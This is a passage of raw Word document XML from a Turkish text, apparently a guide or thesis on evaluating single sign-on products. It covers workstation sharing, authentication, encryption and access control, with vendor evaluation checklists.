        <w:t>Son kullanıcıların bilgi kaynaklarına ulaşmak için mevcut herhangi bir iş istasyonunu kullanma kabiliyeti, son kullanıcıların çok sayıda farklı konumda çalışması beklenen ortamlarda zorunludur. Bu tür kullanıcılar arasında seyahat eden çalışanlar, sağlık hizmeti sağlayıcıları (mobil hemşireler, doktorlar ve teknisyenler), danışmanlar ve satış personeli bulunur. Günümüz dünyasının son derece hareketli işgücünde, bu özelliği sunmayan bir ürünün başarılı olması muhtemel değildir. Başka bir olası özellik iş istasyonu paylaşımını kolaylaştıracaktır; yani, cihazın eşzamanlı olarak birden fazla kullanıcı tarafından paylaşılması, her birinin kendi aktif oturumunun diğerlerinden ayrı olması. Bu özellik, oturum açma ve şifreler paylaşılmayacak şekilde bir ekran değiştirme biçiminin kullanılmasını gerektirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu konudaki potansiyel ihtiyaçları araştırırken, kendinize ve bu tür ürünlerin satıcılarına sormanız gereken sorular şunları içermelidir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 1. Ortak bir alandaki bir iş istasyonu birçok son kullanıcı tarafından paylaşılabilir mi (örneğin üretim alanı)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 2. Birisi zaten başka bir son kullanıcı tarafından kullanılmakta olan bir iş istasyonunu kullanmak istiyorsa, SSO ürünü mevcut son kullanıcının uygulamalarını (açık belgelerin kapatılması dahil) inceleyerek kapatabilir ve kontrolü yeni son kullanıcıya devredebilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Son kullanıcılar masaüstlerinin organizasyonunu ayarlayabilir mi ve öyleyse, kullandıkları iş istasyonundan bağımsız olarak onlarla birlikte seyahat ediyor mu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 4. Bireysel uygulama tercihleri ​​son kullanıcıyla diğer iş istasyonlarına (örneğin, MS Word tercihleri) gidebilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 5. Mevcut uygulamaların seti, son kullanıcının ağa giriş noktasına göre değişiklik gösterebilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 6. Bir Novell son kullanıcısı, farklı bir Novell etki alanına atanmış bir iş istasyonunda oturum açarsa, son kullanıcı kendi etki alanına nasıl geri döner?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Kimlik doğrulama için Windows 95 ve Windows NT yerel olarak depolanmış bir şifreye güvenirse, son kullanıcı başka bir iş istasyonuna giriş yaptığında ne olur?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 8. Son başarılı oturum açmanın tarihi ve saati, son kullanıcının izinsiz oturum açmaları için imzaladığı tarihte gösterilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9. İş istasyonlarının diğer son kullanıcılar tarafından istemeden kullanılmasını önlemek için, oturum açan son kullanıcının adı belirgin bir şekilde gösteriliyor mu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc9978718"/>
      <w:bookmarkStart w:id="85" w:name="_Toc9979200"/>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2.12.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A2AB5">
        <w:t>Doğrulama</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kimlik doğrulama, kullanıcıların iddia ettiği kişi olduklarını sağlar. Ayrıca, tüm işlem ve işlemlerin yalnızca yetkili son kullanıcılar tarafından başlatılmasını da sağlar. Kullanıcı kimlik doğrulaması, kullanıcı adı ve parolayı birleştirerek kullanıcı için bir tanımlayıcı, erişim ayrıcalıklarını atama mekanizması ve sisteme erişim, işlem başlatması ve diğer eylemler gibi tüm etkinliklerin izleneceği bir denetim "işaretçisi" sağlar. (örneğin, oturum açma girişimi). Bu nedenle, kimlik doğrulama sürecinde, “kim” ve “neyi” kontrol etmek ve izlemek için araçlar vardır. SSO ürünleri bu süreci alır ve oturum açma uygulamalarını geliştiren ve genişleten ek hizmetler için kullanılmasını sağlar. / şifre kombinasyonu. Bu uygulamaların bazıları, güvenliği de artıran kullanıcıya kolaylık sağlar: İş istasyonunu kısa bir süre önce terk etmeden hemen önce iş istasyonunu kilitleme yeteneği, iş istasyonunu başka bir kişi tarafından kötüye kullanım için açık bırakmak yerine, kullanıcının iş yapma olasılığının daha yüksek olduğu anlamına gelir. Bazıları denetim araçlarının uzantılarıdır: son giriş girişiminin görüntülenmesi ve tüm girişlerin günlük girişi. Bu özellikler kesinlikle SSO'ya özgü değildir, ancak işlevselliğini genişletir ve geliştirir ve böylece daha kullanıcı dostu hale getirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Genel Anahtar Altyapısı (PKI) kurulumunun bir parçası olarak, SSO dijital sertifika kimlik doğrulamasını destekleme yeteneğine sahip olmalıdır. SSO, çeşitli yöntemlerle (belirteç, şifre girişi, muhtemelen biyometri), kullanıcı için sistemin daha sonra Kerberos biletine benzer bir şekilde hem onaylayıcı hem de erişim lisansı “lisansı” olarak kullandığı bir dijital sertifika sağlar. Buradaki hayati nokta, bu işlevselliğin gerçekte nasıl gerçekleştirildiği değil (başka bir uzun tartışma), ancak SSO'nun bir PKI ile desteklediği ve bütünleştiği ve bunu </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>yaparken geniş çapta tanınmış standartlar kullandığıdır. Bununla birlikte, daha yaygın erişim kontrol programları yoluyla elde edilebilen standart özellikler grubundan daha az teklif sunan herhangi bir SSO ürününün göz önünde bulundurulmaması gerektiğine dikkat edilmelidir. Böyle bir ürün, “daha ​​iyi olan” öncülünde daha zengin özellikli SSO ürünlerine bir alternatif olarak sunulabilir. Bu durumda daha basit değildir, çünkü etkinliği düşürür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Adayların ölçüp ölçmeyeceğini bilmek için, bu hususlarla ilgili olarak bir araştırma yapılmalıdır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Kimlik doğrulama bir ağ sunucusunda mı yoksa iş istasyonunda mı?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Doğrulama kanıtlanmış ve kabul edilmiş bir standartla (ör. Kerberos) yapılıyor mu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Tüm oturum açma girişimleri kaydedildi mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Sitede belirtilen sayıda başarısız oturum açma girişiminin ardından, gelecekteki tüm oturum açma girişimleri koşulsuz olarak reddedilebilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Bir süre etkinlik olmadığında masaüstünü kilitlemek veya kapatmak için etkin olmayan bir zamanlayıcı var mı?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Birisi bir iş istasyonunu terk ettiğinde (örneğin, tek bir tuşa basılması), masaüstü kolayca kilitlenebilir veya kapatılabilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Son başarılı oturum açmanın tarihi ve saati, son kullanıcının izinsiz oturum açmaları için oturum açtığı tarihte mi gösteriliyor?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc9978719"/>
      <w:bookmarkStart w:id="87" w:name="_Toc9979201"/>
      <w:r w:rsidRPr="00C32BE6">
        <w:t>2.13.Şifreleme</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Şifreleme, son kullanıcılar ve güvenlik sunucuları / sunucuları ve eriştikleri uç nokta uygulamaları arasında bulunan bilgilerin casusluk, satır dokunma veya başka bir gizli dinleme yöntemiyle engellenmemesini sağlar. Birçok SSO ürünü, son kullanıcı ile güvenlik sunucusu arasındaki trafiği şifreler ancak son kullanıcı ile son nokta uygulamaları arasında açık metin geçişi sağlayarak potansiyel bir güvenlik açığının ortaya çıkmasına neden olur. Bazı ürünler varsayılan olarak iş istasyonu ile sunucu arasındaki tüm trafiği şifreler, bazıları yoktur ve yine de bazıları bu özelliği kurulumda seçilebilecek bir seçenek olarak sunar. Her kurulum kendi ortamında ve gereksinimlerinde farklıdır. Aynı şey, riskler ve güvenlik açıkları söz konusu olduğunda da geçerlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1356" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu adresi kapsayacak noktalar şunları içerir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1356" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• İş istasyonu ile SSO sunucusu arasındaki tüm trafik şifrelenmiş mi? • SSO ürünü, uç nokta uygulamalarında değişiklik yapılmasını gerektirmeden uç nokta uygulamalarına (örneğin bilgisayar odası) kadar şifreleme sağlayabilir mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1356" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Veri akışı kabul edilmiş ve kanıtlanmış bir standart algoritma (örneğin, DES, Triple DES, IDEA, AES veya diğer) kullanılarak şifreleniyor mu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="88" w:name="_Toc9978720"/>
      <w:bookmarkStart w:id="89" w:name="_Toc9979202"/>
      <w:r w:rsidRPr="00C32BE6">
        <w:t>2.14. Giriş Kontrolü</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Son kullanıcılara yalnızca erişme yetkisi olan uygulamalar sunulmalıdır. Bu uygulamaları başlatmak için gereken faaliyetler dikkatle değerlendirilmelidir, çünkü birçok SSO ürünü yalnızca API tabanlı uç nokta uygulamalarının katılabileceğini ya da SSO'nun tüm uç nokta uygulamalarının uyması gereken tek bir şifrenin sahibi olduğunu varsaymaktadır. Bu aktiviteler, uygulama şifrelerini süresi dolduklarında otomatik olarak girmeyi ve güncellemeyi içerir. Sergi 7.3, SSO'nun bir kullanıcının yetkilendirildiği tüm kaynakların otomatik oturum açmayı ve edinilmesini nasıl kolaylaştırdığını göstermektedir. Kullanıcı kimlik doğrulama sunucusunda oturum açar (ağda merkezi olarak konumlandırılmıştır). Bu daha sonra kullanıcıyı ve erişim haklarını doğrular. Sunucu daha sonra doğrulanmış kimlik bilgilerini gönderir ve kullanıcıyı oturum açmak ve kaynaklarını başlatılan oturuma eklemek için gerekli komut dosyalarını etkinleştirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C32BE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F6658D0" wp14:editId="746A1E8E">
            <wp:extent cx="5760720" cy="2226366"/>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iz1.JPG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5763238" cy="2227339"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="262320D4" wp14:editId="2CAF2694">
            <wp:extent cx="5760720" cy="24536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iz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E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Otomatik olarak oluşturulan şifrelerin kullanıcının hayatını kolaylaştıracağı kesin olarak doğru olsa da, mevcut en iyi uygulama, kullanıcıların kendi şifrelerini oluşturmalarını ve kullanmalarını sağlamaktır. Bununla birlikte bu şifrelerin sözdizimini düzenleyen bir kural olmalıdır; örneğin, sözlük kelimeleri, sayı ve harflerin bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00C32BE6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
